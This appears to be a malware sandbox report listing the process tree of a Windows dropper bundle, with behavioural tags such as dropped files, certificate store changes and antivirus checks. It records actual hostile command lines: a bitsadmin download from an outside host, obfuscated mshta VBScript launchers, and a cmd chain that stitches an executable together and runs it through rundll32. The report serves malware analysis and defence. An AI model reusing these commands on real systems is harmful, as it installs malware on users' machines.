-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0h0bk5uj.dhu\autosubplayer.exe /S & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\0h0bk5uj.dhu\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\0h0bk5uj.dhu\autosubplayer.exe /S11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf3CE9.tmp\tempfile.ps1"12⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z12⤵
- Download via BitsAdmin
-
-
-
-
-
C:\Program Files\Windows NT\UAXSARTSNH\foldershare.exe"C:\Program Files\Windows NT\UAXSARTSNH\foldershare.exe" /VERYSILENT9⤵
- Checks whether UAC is enabled
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hRsLaLneVlTs6DxA_MKp8bwQ.exe"C:\Users\Admin\Pictures\Adobe Films\hRsLaLneVlTs6DxA_MKp8bwQ.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--AelopX6Kw"8⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ffd78aedec0,0x7ffd78aeded0,0x7ffd78aedee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff74f3c9e70,0x7ff74f3c9e80,0x7ff74f3c9e9010⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=1808 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1760 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1952 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=2196 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --disable-gpu-compositing --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2560 /prefetch:19⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --disable-gpu-compositing --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=2592 /prefetch:19⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=3188 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=3220 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=4060 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=1500 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1744,13729531171445215680,10539383769026430115,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10788_97213788" --mojo-platform-channel-handle=3348 /prefetch:89⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0768bf0e01cf08ac5.exeSun0768bf0e01cf08ac5.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0768bf0e01cf08ac5.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )6⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "" == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0768bf0e01cf08ac5.exe" ) do taskkill -im "%~NXt" -f7⤵
-
C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe..\8S~LNTCBHnM.EXe -PhymCZvLUAWi8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "-PhymCZvLUAWi " == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" ) do taskkill -im "%~NXt" -f10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cloSe ( CREaTeObJecT ( "WscrIPT.sHELL" ). RUN ("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true ) )9⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\TSiZ8.~11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\TSiZ8.~13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\TSiZ8.~14⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Sun0768bf0e01cf08ac5.exe" -f8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0746b3c4631.exeSun0746b3c4631.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2GLRB.tmp\Sun0746b3c4631.tmp"C:\Users\Admin\AppData\Local\Temp\is-2GLRB.tmp\Sun0746b3c4631.tmp" /SL5="$6006A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun0746b3c4631.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-425S5.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-425S5.tmp\lakazet.exe" /S /UID=27207⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\88-18aaa-c07-1a6aa-a5081e6f4cd78\Lesuliminae.exe"C:\Users\Admin\AppData\Local\Temp\88-18aaa-c07-1a6aa-a5081e6f4cd78\Lesuliminae.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29689⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\a6-a2a63-1df-5df80-03b290c2592c3\Vaezhasyholae.exe"C:\Users\Admin\AppData\Local\Temp\a6-a2a63-1df-5df80-03b290c2592c3\Vaezhasyholae.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pv3mtgah.xvk\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pv3mtgah.xvk\setting.exeC:\Users\Admin\AppData\Local\Temp\pv3mtgah.xvk\setting.exe SID=778 CID=778 SILENT=1 /quiet10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pv3mtgah.xvk\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pv3mtgah.xvk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636621712 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0gvb3fhe.uoa\vinmall_da.exe /silent & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\0gvb3fhe.uoa\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\0gvb3fhe.uoa\vinmall_da.exe /silent10⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exe /eufive10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\aqirkjbk.tln\GcleanerEU.exe" & exit12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f13⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpyvttry.ffi\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\mpyvttry.ffi\installer.exeC:\Users\Admin\AppData\Local\Temp\mpyvttry.ffi\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mpyvttry.ffi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mpyvttry.ffi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636621712 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xm2avmrv.dep\vpn.exe /silent /subid=798 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\xm2avmrv.dep\vpn.exeC:\Users\Admin\AppData\Local\Temp\xm2avmrv.dep\vpn.exe /silent /subid=79810⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D6RKS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-D6RKS.tmp\vpn.tmp" /SL5="$6030C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xm2avmrv.dep\vpn.exe" /silent /subid=79811⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "12⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090113⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090113⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall12⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install12⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fs2pqjbo.aqd\a.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\fs2pqjbo.aqd\a.exeC:\Users\Admin\AppData\Local\Temp\fs2pqjbo.aqd\a.exe10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qlsmzvsg.qew\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qlsmzvsg.qew\any.exeC:\Users\Admin\AppData\Local\Temp\qlsmzvsg.qew\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\qlsmzvsg.qew\any.exe"C:\Users\Admin\AppData\Local\Temp\qlsmzvsg.qew\any.exe" -u11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fovm2zd4.l2p\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\fovm2zd4.l2p\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fovm2zd4.l2p\gcleaner.exe /mixfive10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\fovm2zd4.l2p\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fovm2zd4.l2p\gcleaner.exe /mixfive11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eqsmtyw1.bch\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\eqsmtyw1.bch\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\eqsmtyw1.bch\autosubplayer.exe /S10⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
- Loads dropped DLL
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb35D9.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mcvzgis.osn\installer.exe /qn CAMPAIGN=654 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\0mcvzgis.osn\installer.exeC:\Users\Admin\AppData\Local\Temp\0mcvzgis.osn\installer.exe /qn CAMPAIGN=65410⤵
-
-
-
-
C:\Program Files\Windows NT\VHIUSBHGYP\foldershare.exe"C:\Program Files\Windows NT\VHIUSBHGYP\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07610e6b216b74271.exeSun07610e6b216b74271.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07610e6b216b74271.exeC:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07610e6b216b74271.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun073980a935.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun073980a935.exeSun073980a935.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\M3YpCfBOqCeBiNi8diftJx6e.exe"C:\Users\Admin\Pictures\Adobe Films\M3YpCfBOqCeBiNi8diftJx6e.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e840e6fb5.exeSun07e840e6fb5.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6PAKH.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PAKH.tmp\Sun07e840e6fb5.tmp" /SL5="$50052,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e840e6fb5.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e840e6fb5.exe"C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e840e6fb5.exe" /SILENT7⤵
